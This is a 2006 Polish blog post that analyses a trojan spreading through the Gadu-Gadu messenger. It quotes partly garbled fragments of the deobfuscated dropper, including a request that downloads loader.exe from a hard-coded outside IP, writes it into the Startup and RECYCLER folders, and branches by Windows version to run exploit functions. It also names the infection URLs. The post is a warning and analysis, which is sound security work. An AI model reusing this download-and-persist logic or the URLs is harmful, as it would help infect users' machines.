eRIZ's weblog

PHP, webdesign, Linux, Windows i inne, bo nie samym chlebem człowiek żyje

Gadu-Padu – trojanik

Zaaktualizowano: 27 grudnia 2006 (zobacz modyfikację)

Przez ostatnie dwa dni zauważyłem w opisach wielu ludzi tekst podobny do tego: „padło mi gg” albo „nie dochodzą moje wiadomości”. Heh, myśle sobie, że może serwerek uznał delikwentów za spammerów, bo korzystali z inwigilatorów. Ale nieee, sprawa jest chyba trochę grubsza, na dodatek – na skalę masową. Od wczoraj komunikacja większości osób przebiega przez opisy. Na domiar złego dzisiaj dostaję sznurek z opisem:

wybuch w niemczech www.supercqb.com/material_2006_19_11_14970.html

Wcześniej dostał to brat i jak zwykle do niego „odpal to”. No co? Trzeba wiedzieć, co to jest, nie? :D

Ok, tak jak podejrzewaliśmy – trojanik. Kiedyś czytałem, że powstał robak typu proof-of-concept napisany na potrzeby GS, który wysyła wiadomości do wszystkich z listy. Oczywiście w treści był link do niego samego, czyli taka matrioszka.

Po otwarciu linku uruchamia się strona do złudzenia podobna do about:blank (czyli do czystej). Zaglądam pod maskę, a tam zaszyfrowany kod. Trochę zawiły algorytm, ale mnie się na razie nie chce go odszyfrować :P

Robak ten wykorzystał pewnie owego PoC, bo link doń prowadzący dostałem już od kilku osób.

Wspomniałem, że GS blokuje osoby spammujące (czyli wysyłające więcej niż ileśtam wiadomości w ciągu minuty). Jeśli ktoś ma rozbudowaną listę, to trojan bardzo szybko wykorzysta ten limit. Podejrzewam, że właśnie to jest przyczyną problemów.

Istnieje również opcja, że robak posiada wbudowaną obsługę protokołu, a dane wyciąga sobie z profilu użytkownika, więc mógłby egzystować nawet bez zainstalowanego GS (np. na chwilę instalujesz, by konto założyć, wywalasz, ale profil zostawiasz).

Jakie jest rozwiązanie? Przeskanować kompa na obecność wirusów i napisać do autorów GG z prośbą o odblokowanie numeru lub założyć sobie nowy…

Najlepiej, oczywiście, nie korzystać z oryginalnego klienta GS. :P Jak już wcześniej wspomniałem, istnieje opcja, że trojan wykorzystuje pozostałości po profilu użytkownika.

UWAGA: Przed skanowaniem antywirusem upewnij się, że masz najnowsze bazy!!!

edit: Brat wysłał maila do GG i dostał taką odpowiedź:

Blokady zakładane i zdejmowane sa automatycznie. Czas ich trwania zalezy od popełnionego wykroczenia. Zazwyczaj jest to od kilku godzin do kilku dni. Proszę zatem uzbroić się w cierpliwość.

UPDATE

Dzisiaj zaatakował inny trojan. Rozsyła się przez inny link: www.hsqvyrpzeh.info/?awbiby.jpg. W celu zamaskowania podaje losową wartość query string (tą po znaku zapytania). Tym razem, zapewne w celu ukrycia przed osobami, które chciałyby ostrzec innych, robak sprawdza user-agent i gdy używamy IE – przesyła kod (oczywiście zaszyfrowany). Analizując rozpracowany kod można doszukać się ciekawych fragmentów:


  1. span class="co1">//funkcja "przydatna" w dalszej części kodu
  2.  
  3. //poszukajmy folderu autostartu :P
  4. "WScript.Shell","""PROCESS")
  5.         hdrive=wshProcEnv("HOMEDRIVE");
  6.         dtemp=wshProcEnv("TEMP""") {
  7.         hdrive="C:""Startup");
  8. }
  9.  
  10. //teraz dopiero się zacznie - exploit ściąga trojanika z sieci
  11. "GET","http://66.185.126.34:1080/vnew/loader.exe"//dobra, wiemy, że programik zapisał się w autostarcie, ale sensu tego poniżej nie rozumiem... Po co zapisywać w koszu?
  12. fn = "C:\\RECYCLER\\"".exe"//o yeah, let's dance - popatrz, gdzie jesteśmy :D
  13. //początkowo umknie oku, ale w oryginale mamy inne rozszerzenie
  14. "C:\\NTDETECT.EXE"//w ten sposób spada ryzyko ręcznego usunięcia, bez udziału AV
  15.  
  16. //robaczek działa na każdej wersji Windows:
  17. "Microsoft Internet Explorer""Win32""XPSP2""XP":
  18.                                 mdac();
  19.                                 java();
  20.                                 setTimeout('wvf()'"2K""2K3""98""ME""NT""95"//...łącznie z Windows 2003

Wcześniej jest jeszcze zaszyfrowany kawałek kodu.

OK, exploit już się uruchomił, zobaczmy, co mamy dalej. Ściągnięty i urchomiony został exec wielkości ~42KB. Co w nim mamy? Otóż, staranność jego zaszyfrowania już nie jest taka, z jaką mieliśmy do czynienia w explocie. Podejrzałem sobie delikwenta. Przy końcu pliku można zauważyć coś takiego:

  1. //trochę "emotów", żeby wysyłane wiadomości wyglądały jak prawdziwe; nie wiem, czy ta tablica jest w rzeczywistości używana, ale - z tego, co widziałem - nie
  2. //i główna procedura wysyłania - otwiera się zwykłe gniazdko do hosta gg:
  3. //sprintf - szukamy pliku konfiguracyjnego profilu
  4.  

Czyli miałem wcześniej rację – exploit jest samowystarczalny. Wystarczy, że ktoś będzie miał zainstalowane samo GS i trojan sam sobie poradzi. Działanie jest takie samo, jak wcześniej – znaleźć profil, rozesłać się – zablokować profil. Nihil novi…

Zauważyłem nowy objaw: od osób z zainfekowanym kompem trojan wysyła kilkuznakowe, losowe ciągi znaków + któryś z emotów.

24 komentarze

dopisz swój :: trackback :: RSS z komentarzami

RSS z komentarzami :: trackback

Skomentuj

Możesz używać znaczników XHTML. Dozwolone są następujące tagi: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

Wszystkie komentarze przechodzą przez moderację oraz filtry antyspamowe. Nie zostanie opublikowany komentarz, jeśli:

  • Jego treść obraża kogokolwiek.
  • W treści znajdują się wulgaryzmy i słownictwo ogólnie uznane za nieprzyzwoite.
  • Mam wątpliwości co do autora wpisu (Wszelkie anonimy są kasowane - niezależnie od zawartości - wpisz prawdziwy e-mail. Jeśli usunąłem, Twoim zdaniem, komentarz niesłusznie - daj znać). Zdarza się, iż sprawdzam kim jest komentujący.
  • Zawiera jakąkolwiek formę reklamy.

Szufladka